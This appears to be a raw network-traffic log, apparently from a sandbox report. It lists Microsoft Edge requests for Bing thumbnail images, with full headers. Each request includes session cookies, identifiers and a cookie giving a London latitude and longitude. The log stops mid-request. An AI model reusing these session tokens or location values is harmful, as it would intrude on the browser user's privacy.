cookie: bm_sv=F51C12F0AB3E06E3241F6D62FF6558A7~YAAQTTZ6XGOoT4iTAQAAGM4kkRpaZi0bVBCtTANwSkAH0fWYHJL4Z0ak0eGWRx0d91Yt3S1Gpqx8fXWtiH02lu4qOYXv2Kml8ZnTM4Shu2oAy2qYJghYJNeJDUM0X2sD3J9zKV5Sai+MDA0KTxwErd5CZ50F9evkxVpRijbIgXU3WxpyRwQJ732VjazR+GZig+mxnXUW+49w0QEf9WOXAZrUwWtUY3QvDSqpxmofWDF2QGLVjjWDOJDCEdPWLA==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1733306887&WTS=63868903693&PRVCW=1280&PRVCH=601

Response

HTTP/2.0 200

content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 1949
cache-control: public, max-age=1209563
date: Wed, 04 Dec 2024 10:08:49 GMT
x-cache: TCP_MISS from a92-122-54-43.deploy.akamaitechnologies.com (AkamaiGHost/11.7.1-5d2a058efeda81c5505a169a6e16c38e) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2b367a5c.1733306929.4050170f
x-check-cacheable: YES
GET

https://th.bing.com/th?id=OSK.saS2i06jv3ATmkJh8xzUkOCdvF9RSnGunSanx3jQmXs&w=120&h=120&c=6&p=0&pid=RS

msedge.exe

Remote address:

88.221.135.3:443

Request

GET /th?id=OSK.saS2i06jv3ATmkJh8xzUkOCdvF9RSnGunSanx3jQmXs&w=120&h=120&c=6&p=0&pid=RS HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:49.6106115+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=6&RB=0&GB=0&RG=200&RP=3
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=2&HV=1733306921&WTS=63868903693&PRVCW=1280&PRVCH=601
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb

Response

HTTP/2.0 200

content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 4038
cache-control: public, max-age=1518681
date: Wed, 04 Dec 2024 10:08:56 GMT
x-cache: TCP_MEM_HIT from a92-122-54-43.deploy.akamaitechnologies.com (AkamaiGHost/11.7.1-5d2a058efeda81c5505a169a6e16c38e) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2b367a5c.1733306936.40503522
x-check-cacheable: YES
GET

https://th.bing.com/th?id=OSK.dfd24e1bbabcb5712dc2cb8d93c600ac&w=120&h=120&c=6&p=0&pid=RS

msedge.exe

Remote address:

88.221.135.3:443

Request

GET /th?id=OSK.dfd24e1bbabcb5712dc2cb8d93c600ac&w=120&h=120&c=6&p=0&pid=RS HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:49.6106115+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=6&RB=0&GB=0&RG=200&RP=3
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=2&HV=1733306921&WTS=63868903693&PRVCW=1280&PRVCH=601
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb

Response

HTTP/2.0 200

content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 3054
cache-control: public, max-age=1213616
date: Wed, 04 Dec 2024 10:08:56 GMT
x-cache: TCP_MEM_HIT from a92-122-54-43.deploy.akamaitechnologies.com (AkamaiGHost/11.7.1-5d2a058efeda81c5505a169a6e16c38e) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2b367a5c.1733306936.40503529
x-check-cacheable: YES
GET

https://th.bing.com/th?id=OSK.1afcb69f3cff6e025e4f2de83fd8416c&w=120&h=120&c=6&p=0&pid=RS

msedge.exe

Remote address:

88.221.135.3:443

Request

GET /th?id=OSK.1afcb69f3cff6e025e4f2de83fd8416c&w=120&h=120&c=6&p=0&pid=RS HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:49.6106115+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=6&RB=0&GB=0&RG=200&RP=3
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=2&HV=1733306921&WTS=63868903693&PRVCW=1280&PRVCH=601
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb

Response

HTTP/2.0 200

content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 3728
cache-control: public, max-age=2006982
date: Wed, 04 Dec 2024 10:08:56 GMT
x-cache: TCP_MEM_HIT from a92-122-54-43.deploy.akamaitechnologies.com (AkamaiGHost/11.7.1-5d2a058efeda81c5505a169a6e16c38e) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2b367a5c.1733306936.4050352a
x-check-cacheable: YES
GET

https://th.bing.com/th?id=ODLS.f047d28e-f1f4-46c2-af00-a0dcedcd7c73&w=32&h=32&qlt=90&pcl=fffffa&o=6&pid=1.2

msedge.exe

Remote address:

88.221.135.3:443

Request

GET /th?id=ODLS.f047d28e-f1f4-46c2-af00-a0dcedcd7c73&w=32&h=32&qlt=90&pcl=fffffa&o=6&pid=1.2 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:49.6106115+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=6&RB=0&GB=0&RG=200&RP=3
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: bm_sv=F97CC3009A6FB08FD2D5AF48B8560EFC~YAAQTTZ6XAypT4iTAQAAWfgkkRq87VQXMtfSo820qO8DIocM89HFA7LHK81PkKU5u8kxoF0QQ3/O1xtdpc8ymqRGlr73zajjkFgnVjQWJ5Qs6RX4kJ8wtYIGYJ4H77p2pPEdOLlA4JyUyJaQ4BfYGO2sIHhMFWvAN8gyjpTZSyy9biamhWUXdjHOIaqe0B+bFexn+OzubKhGK7/WfXS1/Mw5pH2IDespPJL9wivyM1cVSudxg+iseyb21jSe2A==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3469&DPR=1.0&UTC=0&PV=10.0&EXLTT=2&HV=1733306921&WTS=63868903693&PRVCW=1280&PRVCH=601

Response

HTTP/2.0 200

content-type: image/png
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 584
cache-control: public, max-age=2418479
date: Wed, 04 Dec 2024 10:09:00 GMT
x-cache: TCP_MEM_HIT from a92-122-54-43.deploy.akamaitechnologies.com (AkamaiGHost/11.7.1-5d2a058efeda81c5505a169a6e16c38e) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2b367a5c.1733306940.405049eb
x-check-cacheable: YES
GET

https://th.bing.com/th?id=OIP.ZIKPPAtrb_mH2giGgu2nyQHaEK&w=80&h=80&c=1&vt=10&bgcl=c8cf25&r=0&o=6&pid=5.1

msedge.exe

Remote address:

88.221.135.3:443

Request

GET /th?id=OIP.ZIKPPAtrb_mH2giGgu2nyQHaEK&w=80&h=80&c=1&vt=10&bgcl=c8cf25&r=0&o=6&pid=5.1 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:49.6106115+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=6&RB=0&GB=0&RG=200&RP=3
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: bm_sv=F97CC3009A6FB08FD2D5AF48B8560EFC~YAAQTTZ6XAypT4iTAQAAWfgkkRq87VQXMtfSo820qO8DIocM89HFA7LHK81PkKU5u8kxoF0QQ3/O1xtdpc8ymqRGlr73zajjkFgnVjQWJ5Qs6RX4kJ8wtYIGYJ4H77p2pPEdOLlA4JyUyJaQ4BfYGO2sIHhMFWvAN8gyjpTZSyy9biamhWUXdjHOIaqe0B+bFexn+OzubKhGK7/WfXS1/Mw5pH2IDespPJL9wivyM1cVSudxg+iseyb21jSe2A==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3469&DPR=1.0&UTC=0&PV=10.0&EXLTT=2&HV=1733306921&WTS=63868903693&PRVCW=1280&PRVCH=601

Response

HTTP/2.0 200

content-type: image/png
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 1589
cache-control: public, max-age=440339
date: Wed, 04 Dec 2024 10:09:00 GMT
x-cache: TCP_HIT from a92-122-54-43.deploy.akamaitechnologies.com (AkamaiGHost/11.7.1-5d2a058efeda81c5505a169a6e16c38e) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2b367a5c.1733306940.405049ec
x-check-cacheable: YES
GET

https://th.bing.com/th?id=OVP.R1kmKekxnEGNtcvRzl1u8AHgFo&w=197&h=110&c=7&rs=1&qlt=90&o=6&pid=1.7

msedge.exe

Remote address:

88.221.135.3:443

Request

GET /th?id=OVP.R1kmKekxnEGNtcvRzl1u8AHgFo&w=197&h=110&c=7&rs=1&qlt=90&o=6&pid=1.7 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:49.6106115+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=6&RB=0&GB=0&RG=200&RP=3
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: bm_sv=F97CC3009A6FB08FD2D5AF48B8560EFC~YAAQTTZ6XAypT4iTAQAAWfgkkRq87VQXMtfSo820qO8DIocM89HFA7LHK81PkKU5u8kxoF0QQ3/O1xtdpc8ymqRGlr73zajjkFgnVjQWJ5Qs6RX4kJ8wtYIGYJ4H77p2pPEdOLlA4JyUyJaQ4BfYGO2sIHhMFWvAN8gyjpTZSyy9biamhWUXdjHOIaqe0B+bFexn+OzubKhGK7/WfXS1/Mw5pH2IDespPJL9wivyM1cVSudxg+iseyb21jSe2A==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3469&DPR=1.0&UTC=0&PV=10.0&EXLTT=2&HV=1733306921&WTS=63868903693&PRVCW=1280&PRVCH=601

Response

HTTP/2.0 200

content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 7979
x-check-cacheable: YES
cache-control: public, max-age=1148283
date: Wed, 04 Dec 2024 10:09:00 GMT
x-cache: TCP_MISS from a92-122-54-43.deploy.akamaitechnologies.com (AkamaiGHost/11.7.1-5d2a058efeda81c5505a169a6e16c38e) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2b367a5c.1733306940.405049e1
GET

https://th.bing.com/th?q=Dark+Web+Websites&w=120&h=50&c=7&rs=1&qlt=90&p=0&o=5&pid=1.7&mkt=en-GB&cc=GB&setlang=en&adlt=moderate&t=1

msedge.exe

Remote address:

88.221.135.3:443

Request

GET /th?q=Dark+Web+Websites&w=120&h=50&c=7&rs=1&qlt=90&p=0&o=5&pid=1.7&mkt=en-GB&cc=GB&setlang=en&adlt=moderate&t=1 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
